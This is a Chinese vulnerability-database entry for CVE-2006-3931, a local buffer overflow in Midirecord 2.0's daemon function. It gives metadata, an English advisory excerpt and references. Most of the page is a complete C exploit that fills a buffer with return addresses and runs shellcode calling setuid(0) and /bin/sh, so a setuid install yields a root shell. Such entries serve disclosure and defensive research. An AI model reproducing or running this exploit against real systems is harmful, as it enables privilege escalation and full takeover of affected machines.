Tuomas Airaksinen Midirecord daemon函数本地缓冲区溢出漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110692 漏洞类型 缓冲区溢出
发布时间 2006-07-27 更新时间 2006-08-01
CVE编号 CVE-2006-3931 CNNVD-ID CNNVD-200607-512
漏洞平台 Linux CVSS评分 4.6
|漏洞来源
https://www.exploit-db.com/exploits/28288
https://cxsecurity.com/issue/WLB-2006080012
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200607-512
|漏洞详情
TuomasAiraksinenMidirecord2.0中的daemon函数存在缓冲区溢出。本地用户可以借助长命令行自变量(文件名),执行任意代码。注意:如果Midirecord未setuid安装,则此问题可能不是漏洞。
|漏洞EXP
source: http://www.securityfocus.com/bid/19190/info

Midirecord is prone to a local buffer-overflow vulnerability because it fails to do proper bounds checking on user-supplied data before using it in a finite-sized buffer.

An attacker can exploit this issue to execute arbitrary code in the context of the victim running the affected application. 

Version 2.0 is vulnerable to this issue; other versions may also be affected.

* Successful Exploit in Ubuntu Breezey */
#include <stdio.h>
#include <string.h>
#include <unistd.h>

#define BUFSIZE 225
#define ALIGNMENT 1
int main(int argc, char **argv )
{
        char shellcode[]=
                "\x6a\x17\x58\x31\xdb\xcd\x80"
                "\x6a\x0b\x58\x99\x52\x68//sh\x68/bin\x89\xe3\x52\x53\x89\xe1\xcd\x80";

        if(argc < 2)
                 {
           fprintf(stderr, "Use : %s <path_to_vuln>\n", argv[0]);
             return 0;
             }
        char *env[] = {shellcode, NULL};
        char buf[BUFSIZE];
                int i;
                int *ap = (int *)(buf + ALIGNMENT);
                int ret = 0xbffffffa - strlen(shellcode) - strlen(argv[1]);

                for (i = 0; i < BUFSIZE - 4; i += 4)
                *ap++ = ret;
                execle(argv[1], "/dev/midi1", buf, NULL, env);

}
|参考资料

来源:BID
名称:19190
链接:http://www.securityfocus.com/bid/19190
来源:BUGTRAQ
名称:20060725[ECHO_ADV_41$2006]BufferOverflowinMidirecord2
链接:http://www.securityfocus.com/archive/1/archive/1/441204/100/0/threaded
来源:MISC
链接:http://advisories.echo.or.id/adv/adv41-theday-2006.txt
来源:XF
名称:midirecord-filename-bo(28047)
链接:http://xforce.iss.net/xforce/xfdb/28047
来源:SREASON
名称:1303
链接:http://securityreason.com/securityalert/1303